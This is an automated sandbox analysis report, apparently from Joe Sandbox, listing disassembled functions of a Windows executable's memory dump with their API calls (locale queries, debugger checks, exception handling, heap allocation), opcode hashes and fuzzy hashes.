String ID:
API String ID: 442123175-0
Opcode ID: e6f3bec206de718d360fad53ea554a50776cee537b2caa70c73761b0bb56a0e0
Instruction ID: 6298ce3d4e1cea5b3ca83ecaeb3c98edf587603bd22615e7021e2386212449af
Opcode Fuzzy Hash: e6f3bec206de718d360fad53ea554a50776cee537b2caa70c73761b0bb56a0e0
Instruction Fuzzy Hash: E3217E35A002199BCB19CF29DC809EDB7B9BB49301F6440A9F946D7221D7309E828BA0

Function 00140DF1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00140E3D
GetFileType.KERNELBASE(00000000), ref: 00140E4F

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 320ffe4fe88fbd5e706b1964f22bafb0ade049efcfb3dcd279b5d46345ea2fa7
Instruction ID: 770e1d1f3b9e7b84246fd1d63cd9411aee33e40c1876d45b2cf999ecf574a16b
Opcode Fuzzy Hash: 320ffe4fe88fbd5e706b1964f22bafb0ade049efcfb3dcd279b5d46345ea2fa7
Instruction Fuzzy Hash: AB11D63260875146C7364E3F8C98622BB95A75A330B380F19E6B6A75F1C770D8A6D241

Function 0013A519 Relevance: 3.0, APIs: 2, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(001565E0,0000000C), ref: 0013A52C
ExitThread.KERNEL32 ref: 0013A533

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: f8e8a16817414fed836a604b69e15a47c9faf45f8cb3594e73667e6fcb0afade
Instruction ID: 426de5557155eb6c0c7d30f31c32c9b1be7866f7adad1a275a82c216c32dd2ae
Opcode Fuzzy Hash: f8e8a16817414fed836a604b69e15a47c9faf45f8cb3594e73667e6fcb0afade
Instruction Fuzzy Hash: F7F0C2B0A80204DFDB01BFB0C80AA2E3B74FF15750F504189F551976A1DB706D51CFA2

Function 00140343 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 717caf382da5c5dfac5e9538342da6b7ce47302bc457e40162d955ad3d680cb8
Instruction ID: a0c3902d7127ae2852b52fc745b593943441e50d76753798b110cdc51343bfda
Opcode Fuzzy Hash: 717caf382da5c5dfac5e9538342da6b7ce47302bc457e40162d955ad3d680cb8
Instruction Fuzzy Hash: E801F1337052119FAB17CE6BEC8095A3B96BBC93207258121FB10CB5A4EB34CC819B91

Function 001431FD Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00145916,?,?,00145916,00000220,?,00000000,?), ref: 0014322F

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4e5f4653218d5928c9dc600fb32c7a5fe7b106d8e152a3ea9b89e748e75b0c3f
Instruction ID: 791855fc10e7756c77a0b432f8b2988b8ef5b56093dd4e4b628ff457d5d20577
Opcode Fuzzy Hash: 4e5f4653218d5928c9dc600fb32c7a5fe7b106d8e152a3ea9b89e748e75b0c3f
Instruction Fuzzy Hash: 82E06D3664526066EA212B79AC01F5B7A88AB627B0F1A0121BC65A61B0CBE0CF4082E0

Non-executed Functions

Function 001483F9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00148717,00000002,00000000,?,?,?,00148717,?,00000000), ref: 00148492
GetLocaleInfoW.KERNEL32(?,20001004,00148717,00000002,00000000,?,?,?,00148717,?,00000000), ref: 001484BB
GetACP.KERNEL32(?,?,00148717,?,00000000), ref: 001484D0

Strings

OCP, xrefs: 0014844D
ACP, xrefs: 00148417

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 43db397182cd251d42aaeea7865ec74f289b60cab5a3e9c6d1bf16d1d0869df6
Instruction ID: 900a1ef64ef06153edc9f4b80634e625eeb6a1055bbce480bb1f63cfb873c6bb
Opcode Fuzzy Hash: 43db397182cd251d42aaeea7865ec74f289b60cab5a3e9c6d1bf16d1d0869df6
Instruction Fuzzy Hash: 7B217172B00102AADB349F54C905B9F72AABB50B64B5F8464E90ADB135EF32DD81D350

Function 001485CE Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0013FB30: GetLastError.KERNEL32(?,?,0013A53E,001565E0,0000000C), ref: 0013FB34
Part of subcall function 0013FB30: SetLastError.KERNEL32(00000000), ref: 0013FBD6

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 001486DA
IsValidCodePage.KERNEL32(00000000), ref: 00148723
IsValidLocale.KERNEL32(?,00000001), ref: 00148732
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0014877A
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00148799

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: c3ae853cb9626207bf7b15fc4151f05388240f8e9e9a27c13533252fc02ffc16
Instruction ID: b9ea5eaa6b167ea612c9c603d575ca3df96d47a51d948e926d12732b276cbd44
Opcode Fuzzy Hash: c3ae853cb9626207bf7b15fc4151f05388240f8e9e9a27c13533252fc02ffc16
Instruction Fuzzy Hash: 7A51A171A00215AFDB51DFA4CC41ABE77B8FF18700F164429F914EB1A0EF709944CB61

Function 00147C6A Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0013FB30: GetLastError.KERNEL32(?,?,0013A53E,001565E0,0000000C), ref: 0013FB34
Part of subcall function 0013FB30: SetLastError.KERNEL32(00000000), ref: 0013FBD6

GetACP.KERNEL32(?,?,?,?,?,?,0013E25F,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00147D2B
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0013E25F,?,?,?,00000055,?,-00000050,?,?), ref: 00147D56
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00147EB9

Strings

utf8, xrefs: 00147E28

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 49ad5ec6a075e075b0f5c48324ad7edfe0609e7165402c6f42112136482a5165
Instruction ID: 7cc18f09c75f1e5489c7edccf296d17fd530f47efdf291a54a26251b85c78dc1
Opcode Fuzzy Hash: 49ad5ec6a075e075b0f5c48324ad7edfe0609e7165402c6f42112136482a5165
Instruction Fuzzy Hash: 3B713971A04306AAEB29AB74CC42BBB73A8EF54704F154569F905EB1E1FB70ED4187A0

Function 00135AE9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00135AF5
IsDebuggerPresent.KERNEL32 ref: 00135BC1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00135BDA
UnhandledExceptionFilter.KERNEL32(?), ref: 00135BE4

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 59ef8fffb657c5bdeeb9831d3002e2c97350f1f2777dab3d35c8a3ac7fa5cb34
Instruction ID: 80d4123614ef3e1a648031be00f3a6498402c9790e4edd6ad8390bb5ff81d506
Opcode Fuzzy Hash: 59ef8fffb657c5bdeeb9831d3002e2c97350f1f2777dab3d35c8a3ac7fa5cb34
Instruction Fuzzy Hash: 8231D5B5D052189BDF21DFA4D989BCDBBF8BF18704F1041AAE40CAB250EB719A85CF45

Function 0014807D Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0013FB30: GetLastError.KERNEL32(?,?,0013A53E,001565E0,0000000C), ref: 0013FB34
Part of subcall function 0013FB30: SetLastError.KERNEL32(00000000), ref: 0013FBD6

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001480D1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0014811B
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001481E1

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: b60378bd50ccf4d3af893d42f09400b4bb8d422e13feef6ae2acc16e82f82d31
Instruction ID: 91eb125742191b6f6cc06126626bed0b9edaba59bfa32159fa88c415e4ca15f7
Opcode Fuzzy Hash: b60378bd50ccf4d3af893d42f09400b4bb8d422e13feef6ae2acc16e82f82d31
Instruction Fuzzy Hash: AB618F71A006179FEB689F28CC82FAEB3A8FF14700F14416AED05C65A5EB74D996CB50

Function 00139833 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0013992B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00139935
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00139942

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: be6f6425653be17e64e5102caa033eda3a438c11e1d42a252c5631a8218582e2
Instruction ID: 9e27b14e69f55e3411f92033adeb532895fd3bfd1e22d2153b4999cec59417bb
Opcode Fuzzy Hash: be6f6425653be17e64e5102caa033eda3a438c11e1d42a252c5631a8218582e2
Instruction Fuzzy Hash: 8031C274901228ABCB21DF68D9897CDBBF8BF18314F5041EAE41CA7261E7709F858F45

Function 001442CF Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,001442CA,?,?,?,?,?,?,00000000), ref: 001444FC

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: d2f27a7f2d704194394e52570f63de531a032f1e07e507c6bc7c9582f0f6eb7e
Instruction ID: c096bfe370d972db9f1652807284516365fed18393aacd93a669ddf8c64b3eea
Opcode Fuzzy Hash: d2f27a7f2d704194394e52570f63de531a032f1e07e507c6bc7c9582f0f6eb7e
Instruction Fuzzy Hash: 07B14B31610608DFDB19CF28C48AB657BE0FF45365F298658E99ACF2B1C335E992CB40

Function 001355CC Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 001355E2

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 3ad181977719aae6b562bbd61f7bae271a9b2c49d448c08c5aa0a866694a32e1
Instruction ID: 76b837191d613f9c753a80f815fb69d29b9a9203d54d0036cd2b4d828df409d7
Opcode Fuzzy Hash: 3ad181977719aae6b562bbd61f7bae271a9b2c49d448c08c5aa0a866694a32e1
Instruction Fuzzy Hash: 4851A0F1A14609CFEB14CF59D9827AEBBF5FB48710F94842AD405EB660D375AA80CF60

Function 00145066 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49f3e0db2ecfa07fd5c650c7990f299dcb00bab0964c7b06a4f9a84c6e461e20
Instruction ID: 725086daa777f1211aacf36ff7c3b3cb359e302f1b1743d925211efb07d901e1
Opcode Fuzzy Hash: 49f3e0db2ecfa07fd5c650c7990f299dcb00bab0964c7b06a4f9a84c6e461e20
Instruction Fuzzy Hash: FF41C0B5801619AFDF20DF79CC89AAABBB9AF55300F1442D9F40DE3211DB359E848F60

Function 001482D0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0013FB30: GetLastError.KERNEL32(?,?,0013A53E,001565E0,0000000C), ref: 0013FB34
Part of subcall function 0013FB30: SetLastError.KERNEL32(00000000), ref: 0013FBD6

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00148324

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: d4bea7b17022c7bc9299bdc991b27ecd69d41a833cc02106ccdc1b8a0b28d73c
Instruction ID: 946161538af6d085175d88382fd9348a9710a165a37c6ebaac631c26e8f69961
Opcode Fuzzy Hash: d4bea7b17022c7bc9299bdc991b27ecd69d41a833cc02106ccdc1b8a0b28d73c
Instruction Fuzzy Hash: BE218B72A10206ABEB28AF25DC52ABE73A8FF54B14F14407AFD05C6161EF74ED858B50

Function 00147F57 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0013FB30: GetLastError.KERNEL32(?,?,0013A53E,001565E0,0000000C), ref: 0013FB34
Part of subcall function 0013FB30: SetLastError.KERNEL32(00000000), ref: 0013FBD6

EnumSystemLocalesW.KERNEL32(0014807D,00000001,00000000,?,-00000050,?,001486AE,00000000,?,?,?,00000055,?), ref: 00147FC9

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 9a6f596baf51753fd0e1c0088f121985567009231b2cb4ac4bf65263ad10c794
Instruction ID: 463904a3df66294082437481bc930a08e16a7faf0e93ae018a33235bcf952bda
Opcode Fuzzy Hash: 9a6f596baf51753fd0e1c0088f121985567009231b2cb4ac4bf65263ad10c794
Instruction Fuzzy Hash: 7611483B2043015FDB189F39C8A16BABB91FF80368B18482DE99687B90D771B847C740

Function 001484FF Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 0013FB30: GetLastError.KERNEL32(?,?,0013A53E,001565E0,0000000C), ref: 0013FB34
Part of subcall function 0013FB30: SetLastError.KERNEL32(00000000), ref: 0013FBD6

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00148299,00000000,00000000,?), ref: 0014852B

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 99ee13c258a53ba20545a740d14b5ce0285c9dea4c68fe51e9cac771afdd10ea
Instruction ID: ae8a6ee224612ea647f0329d30e588e9c6d49410cd085ec4d168c6ef6e07b2dc
Opcode Fuzzy Hash: 99ee13c258a53ba20545a740d14b5ce0285c9dea4c68fe51e9cac771afdd10ea
Instruction Fuzzy Hash: C6F0F932A00111AFDB289B24D845BBE7758EB40758F054428EC0EB7190EF74FD42C5A0

Function 00147FF2 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0013FB30: GetLastError.KERNEL32(?,?,0013A53E,001565E0,0000000C), ref: 0013FB34
Part of subcall function 0013FB30: SetLastError.KERNEL32(00000000), ref: 0013FBD6

EnumSystemLocalesW.KERNEL32(001482D0,00000001,00000000,?,-00000050,?,00148672,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0014803C

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: a7873565fe7b49dc165eea99cfc49186fc17c9f92cf042cc9cfba58190f28aff
Instruction ID: 8076c569c003274fbc9097d6a7ae861a61fb0d05690e1736b4f9dc16586d7ce4
Opcode Fuzzy Hash: a7873565fe7b49dc165eea99cfc49186fc17c9f92cf042cc9cfba58190f28aff
Instruction Fuzzy Hash: 61F0C2762103085FDB24AF399885A6F7B91EF81768F05442DF9454B6A0CBB19C42C650

Function 001400AF Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0013C025: EnterCriticalSection.KERNEL32(?,?,0013F808,?,001568D0,00000008,0013F9CC,?,?,?), ref: 0013C034

EnumSystemLocalesW.KERNEL32(001400A2,00000001,00156950,0000000C,00140511,00000000), ref: 001400E7

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: ce1d0ebda1e03264ebdebff243bb1268ebedd9a396bc6a3696cf0217bc6d174f
Instruction ID: 786d645f34c09d340c0f3ef6ed30ba48654d533295269210eaf78aebc25238a7
Opcode Fuzzy Hash: ce1d0ebda1e03264ebdebff243bb1268ebedd9a396bc6a3696cf0217bc6d174f
